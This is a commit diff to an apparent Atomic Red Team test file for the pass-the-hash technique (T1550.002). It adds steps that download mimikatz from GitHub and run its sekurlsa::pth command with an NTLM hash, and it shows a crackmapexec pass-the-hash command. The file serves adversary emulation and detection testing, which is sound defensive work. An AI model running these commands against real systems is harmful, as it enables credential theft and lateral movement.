Update T1550.002.yaml (#1235)

added code to make prereq commands for test 1.

atomics/T1550.002/T1550.002.yaml

@@ -21,9 +21,26 @@ atomic_tests:
       description: domain
       type: string
       default: atomic.local
+    mimikatz_path:
+      description: mimikatz windows executable
+      type: Path
+      default: '%tmp%\mimikatz\x64\mimikatz.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+    prereq_command: |
+      $mimikatz_path = cmd /c echo #{mimikatz_path}
+      if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+    get_prereq_command: |
+      $mimikatz_path = cmd /c echo #{mimikatz_path}
+      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+      New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+      Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
   executor:
     command: |
-      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+      #{mimikatz_path} sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
     name: command_prompt
 - name: crackmapexec Pass the Hash
   auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
@@ -63,4 +80,4 @@ atomic_tests:
   executor:
     command: |
       crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
-    name: command_prompt
+    name: command_prompt